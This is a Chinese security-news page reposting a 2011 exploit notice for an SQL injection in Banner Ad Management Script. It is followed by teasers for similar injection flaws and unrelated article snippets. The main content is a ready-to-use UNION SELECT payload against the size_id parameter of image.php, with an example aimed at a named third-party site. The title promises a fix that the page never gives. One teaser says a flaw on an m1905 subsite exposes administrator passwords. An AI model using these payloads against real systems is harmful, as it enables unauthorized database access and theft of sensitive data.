Banner Ad Management Script SQL注入漏洞及修复

 
Banner Ad Management Script 是一款网站横幅广告管理系统,Banner Ad Management Script存在SQL注入漏洞,可能导致敏感信息泄露。

[+]info:
~~~~~~~~~
[~] Exploit Title : Banner Ad Management Script [ Sql Injection Vulnerability]
[~] Author : Egyptian.H4x0rz
[~] Contact : SpY(at)Hotmail.Com
[~] Date : 02-04-2011
[~] Software Link: http://www.softbizscripts.com/banner-ads-management-script-features.php
[~] category: Web Apps [SQli]
[~] HomePage : Black-hat.cc

[+]poc:
~~~~~~~~~
*SQL injection Vulnerability*
[#] http://patch/image.php?size_id=-1+union+select+1,[sqli],3,4,5,6,7,8,9,10,11
[#] eXample
http://bbs.honkwin.com//ad-manager/image.php?size_id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11

 

更多相关文章
  •    IrIran Shoping是一款在线电子商务系统,IrIran Shoping中的page.php存在SQL注入漏洞,可能导致敏感信息泄露. [+]info:~~~~~~~~~ [~] Title     : IrIran Shoping Script SQL Injection Vulne ...
  • Readmore Systems Script是一款新闻类脚本系统, Readmore Systems Script中的news.php文件存在SQL注入漏洞,可能导致敏感信息泄露. [+]info:~~~~~~~~~ # Exploit Title: [Sql injextion]# Google ...
  • m1905分站sql注入漏洞及修复
    m1905分站sql注入漏洞,可获取管理员密码及进行拖库. m1905分站:http://piao.m1905.com/list.php?pid=39   由于对pid的过滤不严格导致get型的sql注入漏洞.     修复方案: 过滤 作者 Adra1n
  •   DVD Rental Software是一款电子商务软件,DVD Rental Software中的index.php存在SQL注入漏洞,可能导致敏感信息泄露.[+]info:~~~~~~~~~# Exploit Title: DVD Rental Software SQL injection ...
  • vBulletin是一款著名的商业论坛程序,vBulletin 3.8.x中的EggAvatar插件存在SQL注入漏洞,可能导致敏感信息泄露. [+]info:~~~~~~~~~EggAvatar for vBulletin 3.8.x SQL Injection Vulnerability [+] ...
一周排行
  •  用Ant构建脚本(3) 三.Ant的数据元素和数据类型Ant的数据类型定义包括三个级别:project-level.target-level和task-level.这里代表了其在Ant中的可视性,如直接定义在pro ...
  • 易网科技讯 8月18日消息,聚美优品(NYSE:JMEI)今日宣布,已任命徐小平为公司独立董事,该任命已于8月18日正式生效.除此之外,徐小平还将担任聚美优品董事会下属的审计委员会成员.据了解,聚美优品在创办之初,曾 ...
  • 考点6  运算符和表达式的概念 运算符是一种用来对数据进行操作的符号,在c十+语言中又称为操作符.运算中所需要的数据又称为操作数(或运算分量),运算符与操作数组成的符号序列称为表达式.在C++语言中,根据操作数的个数 ...
  • 最近计划做一个新闻网站,前端打算用成熟的CMS搭建,后台是mongodb+mysql做数据过滤容器和最终数据存储,选型CMS如下: dedecms:国内某知名cms,以前用过,功能强大,网上资料资料很多,扩展插件和主 ...
  • JVM系列(四)生命周期和classloader
    大体上,class的生命周期是这样子的: 加载相关内容 classLoader是什么?通过 ...
  • 华为荣耀3c怎么省电华为荣耀3c手机省电设置方法
    华为荣耀3c怎么省电?虽然3c电池2300毫安,但应用太多时,仍然耗电很快,但荣耀3c改动 ...
  • 随着移动互联网的迅速普及,智能手机已经进入风险爆发期,智能手机用户遭受网络欺诈并造成财产损失的数量将直线上升.这一趋势将促使移动安全市场迅速成熟,一个规模百亿的新市场成为众多移动应用安全商掘金的新蓝海. 研究机构全球 ...
  • 天天酷跑字母t和a在哪掉落 字母ta掉落地点
    天天酷跑字母t和a在哪掉落 字母ta掉落地点.天天酷跑字母收集活动再次开启,然而字母T和字 ...
  • 在使用JS编程中,有时需要在一个方法返回两个个或两个以上的数据,用下面的几种方法都可以实现: 1 使用数组的方式,如下: <html> <head> <title>JS函数返回多个 ...
  • /* * heap management in finsh shell. * * COPYRIGHT (C) 2006 - 2013, RT-Thread Development Team * * This file ...